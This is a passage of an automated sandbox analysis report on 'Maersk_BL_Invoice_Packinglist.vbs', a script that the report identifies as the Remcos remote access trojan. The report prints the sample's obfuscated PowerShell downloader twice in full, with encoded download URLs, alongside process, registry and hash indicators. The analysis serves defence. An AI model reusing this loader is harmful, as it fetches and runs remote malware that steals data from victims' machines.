0b1u0 1l f irrbe,fsohxs/m1a2d1a.,0s ';$grampa=toddyernes ' upsce ra- augse,nst, ';$siddembler=toddyernes 'ahst tdp.s : /p/ cso n,tfeem e.g ap.vc o,m .dd oe/no.umthgka,s s e,d ..etmtz >,h t,tfpr: /,/ 1 0 3 .r1b9p5,.i2.3m7 .p4,3d/,ouuntsgda.sss,esd . esm z. ';$hamskiftets=toddyernes ' >. ';$catguts=toddyernes ' ide x, ';$arbejdsgangene='filnavnene';$characterisation = toddyernes 'aebc.hion %.asp prd,autuab% \pstcaagb.r o s.ehl,yd. tho.rz a& & .evcch,oh bto ';unopportunely (toddyernes '.$cg laoeb a.l.:offl a gsktn,a prp.e rps,= (.c,m d h/scs i$,c h a,rmascktbeir,igs,a t ifoun,)u ');unopportunely (toddyernes 'b$sg l.oabsaal :as.k a lba tbr ipnpn,e.ttst=s$nscird dse mabplhe r.. ssp,lciytg(u$ h.a mtsak idf t ebtisk)s ');unopportunely (toddyernes 's[nn ect.. s.e,r v,iuc e p o.i,n tbmdacn a gke rl].:s:ssue caurrtint yspsrsortkofc o l ,=, u[cnue t.. sse csuprtipt.y.pur.ortpouc,o l tsyap ea]b:g: tblss 1i2. ');$siddembler=$skalatrinnets[0];$trepanationenllaudatory= (toddyernes 'c$,g lao b a l : sloplndbe r ife trss= n.eowc- onbuj ebc t smyas tsepmf.bnveatk. w epbycml i edn t');$trepanationenllaudatory+=$flagknappers[1];unopportunely ($trepanationenllaudatory);unopportunely (toddyernes ',$,s oulpdaeprtike t,s..rh e a dcesrtsa[b$.g.raa msp a,]f=s$,d.o k tpo rha,f hga nsd l i n.gzeer ');$narcotisation205=toddyernes ' $ssfo ludbe.ruiseot,s ..d o,w.nmlcokadd fpiflke.( $lspipdnd erm,b loefr,,,$.pca r,doonngn e.rse nvd eo)s ';$pardonnerende=$flagknappers[0];unopportunely (toddyernes 's$mgil o bsa lg:af otrah.j uilcs.=i(ht ejswt - pla tdhu $spbaur dho,nbnpesr e.n,d.ev) ');while (!$forhjuls) {unopportunely (toddyernes '.$mg,ljofb,
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes';if (${host}.currentculture) {$bofllen++;}function toddyernes($experientialistic){$larisas=$experientialistic.length-$bofllen;$stregninger='substri';$stregninger+='ng';for( $trepanationen=1;$trepanationen -lt $larisas;$trepanationen+=2){$byggeforetagender+=$experientialistic.$stregninger.invoke( $trepanationen, $bofllen);}$byggeforetagender;}function unopportunely($unexchangeableness){ & ($catguts) ($unexchangeableness);}$doktorafhandlinger=toddyernes 'hmto z imlvl,am/ 5 .i0c ,( whi n dso w sp ,nwts v1p0 . 0k;. ,w ihn,6s4p;. bx 6 4.; crdvw:,1f2t1r.k0g) ggse cmkpob/,2b0p1.0 0b1u0 1l f irrbe,fsohxs/m1a2d1a.,0s ';$grampa=toddyernes ' upsce ra- augse,nst, ';$siddembler=toddyernes 'ahst tdp.s : /p/ cso n,tfeem e.g ap.vc o,m .dd oe/no.umthgka,s s e,d ..etmtz >,h t,tfpr: /,/ 1 0 3 .r1b9p5,.i2.3m7 .p4,3d/,ouuntsgda.sss,esd . esm z. ';$hamskiftets=toddyernes ' >. ';$catguts=toddyernes ' ide x, ';$arbejdsgangene='filnavnene';$characterisation = toddyernes 'aebc.hion %.asp prd,autuab% \pstcaagb.r o s.ehl,yd. tho.rz a& & .evcch,oh bto ';unopportunely (toddyernes '.$cg laoeb a.l.:offl a gsktn,a prp.e rps,= (.c,m d h/scs i$,c h a,rmascktbeir,igs,a t ifoun,)u ');unopportunely (toddyernes 'b$sg l.oabsaal :as.k a lba tbr ipnpn,e.ttst=s$nscird dse mabplhe r.. ssp,lciytg(u$ h.a mtsak idf t ebtisk)s ');unopportunely (toddyernes 's[nn ect.. s.e,r v,iuc e p o.i,n tbmdacn a gke rl].:s:ssue caurrtint yspsrsortkofc o l ,=, u[cnue t.. sse csuprtipt.y.pur.ortpouc,o l tsyap ea]b:g: tblss 1i2. ');$siddembler=$skalatrinnets[0];$trepanationenllaudatory= (toddyernes 'c$,g lao b a l : sloplndbe r ife trss= n.eowc- onbuj ebc t smyas tsepmf.bnveatk. w epbycml i edn t');$trepanationenllaudatory+=$flagknappers[1];unopportunely ($trepanationenllaudatory);unopportunely (toddyernes ',$,s oulpdaeprtike t,s..rh e a dcesrtsa[b$.g.raa msp a,]f=s$,d.o k tpo rha,f hga nsd l i n.gzeer ');$narcotisation205=toddyernes ' $ssfo ludbe.ruiseot,s ..d o,w.nmlcokadd fpiflke.( $lspipdnd erm,b loefr,,,$.pca r,doonngn e.rse nvd eo)s ';$pardonnerende=$flagknappers[0];unopportunely (toddyernes 's$mgil o bsa lg:af otrah.j uilcs.=i(ht ejswt - pla tdhu $spbaur dho,nbnpesr e.n,d.ev) ');while (!$forhjuls) {unopportunely (toddyernes '.$mg,ljofb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes';if (${host}.currentculture) {$bofllen++;}function toddyernes($experientialistic){$larisas=$experientialistic.length-$bofllen;$stregninger='substri';$stregninger+='ng';for( $trepanationen=1;$trepanationen -lt $larisas;$trepanationen+=2){$byggeforetagender+=$experientialistic.$stregninger.invoke( $trepanationen, $bofllen);}$byggeforetagender;}function unopportunely($unexchangeableness){ & ($catguts) ($unexchangeableness);}$doktorafhandlinger=toddyernes 'hmto z imlvl,am/ 5 .i0c ,( whi n dso w sp ,nwts v1p0 . 0k;. ,w ihn,6s4p;. bx 6 4.; crdvw:,1f2t1r.k0g) ggse cmkpob/,2b0p1.0 0b1u0 1l f irrbe,fsohxs/m1a2d1a.,0s ';$grampa=toddyernes ' upsce ra- augse,nst, ';$siddembler=toddyernes 'ahst tdp.s : /p/ cso n,tfeem e.g ap.vc o,m .dd oe/no.umthgka,s s e,d ..etmtz >,h t,tfpr: /,/ 1 0 3 .r1b9p5,.i2.3m7 .p4,3d/,ouuntsgda.sss,esd . esm z. ';$hamskiftets=toddyernes ' >. ';$catguts=toddyernes ' ide x, ';$arbejdsgangene='filnavnene';$characterisation = toddyernes 'aebc.hion %.asp prd,autuab% \pstcaagb.r o s.ehl,yd. tho.rz a& & .evcch,oh bto ';unopportunely (toddyernes '.$cg laoeb a.l.:offl a gsktn,a prp.e rps,= (.c,m d h/scs i$,c h a,rmascktbeir,igs,a t ifoun,)u ');unopportunely (toddyernes 'b$sg l.oabsaal :as.k a lba tbr ipnpn,e.ttst=s$nscird dse mabplhe r.. ssp,lciytg(u$ h.a mtsak idf t ebtisk)s ');unopportunely (toddyernes 's[nn ect.. s.e,r v,iuc e p o.i,n tbmdacn a gke rl].:s:ssue caurrtint yspsrsortkofc o l ,=, u[cnue t.. sse csuprtipt.y.pur.ortpouc,o l tsyap ea]b:g: tblss 1i2. ');$siddembler=$skalatrinnets[0];$trepanationenllaudatory= (toddyernes 'c$,g lao b a l : sloplndbe r ife trss= n.eowc- onbuj ebc t smyas tsepmf.bnveatk. w epbycml i edn t');$trepanationenllaudatory+=$flagknappers[1];unopportunely ($trepanationenllaudatory);unopportunely (toddyernes ',$,s oulpdaeprtike t,s..rh e a dcesrtsa[b$.g.raa msp a,]f=s$,d.o k tpo rha,f hga nsd l i n.gzeer ');$narcotisation205=toddyernes ' $ssfo ludbe.ruiseot,s ..d o,w.nmlcokadd fpiflke.( $lspipdnd erm,b loefr,,,$.pca r,doonngn e.rse nvd eo)s ';$pardonnerende=$flagknappers[0];unopportunely (toddyernes 's$mgil o bsa lg:af otrah.j uilcs.=i(ht ejswt - pla tdhu $spbaur dho,nbnpesr e.n,d.ev) ');while (!$forhjuls) {unopportunely (toddyernes '.$mg,ljofb,	Jump to behavior

Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerg
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.dr	Binary or memory string: [2024/07/02 01:48:02 Program Manager]
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managern
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:1
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:0
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerx
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerknown.
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager1
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager`
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager6be679r
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager\
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managery
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.dr	Binary or memory string: [2024/07/02 01:48:09 Program Manager]

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

Windows Analysis Report
Maersk_BL_Invoice_Packinglist.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1465860
Product:	CloudBasic
Start time:	07:46:08
Start date:	02.07.2024
Sample:	Maersk_BL_Invoice_Packinglist.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	43fe0e9069047cb153a3e86508d5a6ca
SHA1:	bb5431130b0b3441b9eda1e54bad3f56eb49f04c
SHA256:	bcd66ce1c9d8d1123249ef8240a6e7ef32662aaa897845e866627ee69b28dff1
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	49AEBF8CBD62D92AC215B2923FB1B9F5	1723BE06719828DDA65AD804298D0431F6AFF976	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	D27318E26393322A4106712C7D17C36A	A8E11B608EE98AC054D1DF228CBFF60E4FD56FAA	954BEADA3A026890EA23AE61B65118701FDA885591623D4542640007BF10CB7A
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	DD89E182EEC1B964E2EEFE5F8889DCD7	326A3754A1334C32056811411E0C5C96F8BFBBEE	383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F23953D4A58E404FCB67ADD0C45EB27A	2D75B5CACF2916C66E440F19F6B3B21DFD289340	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h45yca3z.n0i.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_it3jblhk.1tt.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgmxergi.2iy.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywes52nc.utm.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Scabrosely.Tor	ASCII text, with very long lines (65536), with no line terminators	EB7223B18EB13FE6DF85647AE9D12722	A406984BD7E5CE4214402F0B8D8B4731976EE47A	C3D1F59479601B37115C2C73552D208EDA7F5DE0817C57713025E20B2FBC1EF4
C:\Users\user\AppData\Roaming\kpburtts.dat	data	ED0DDD4DD6F81CC3F75B590A9250310C	C34DB1266FD24EAB94061280E2D36F90BBDCE88E	C8631C250182AE9042B438DCBC3632D112C3B83F49E13BC09A38ADD80A3B8C6B

Windows Analysis Report Maersk_BL_Invoice_Packinglist.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Maersk_BL_Invoice_Packinglist.vbs

Malware Threat Intel
Provided by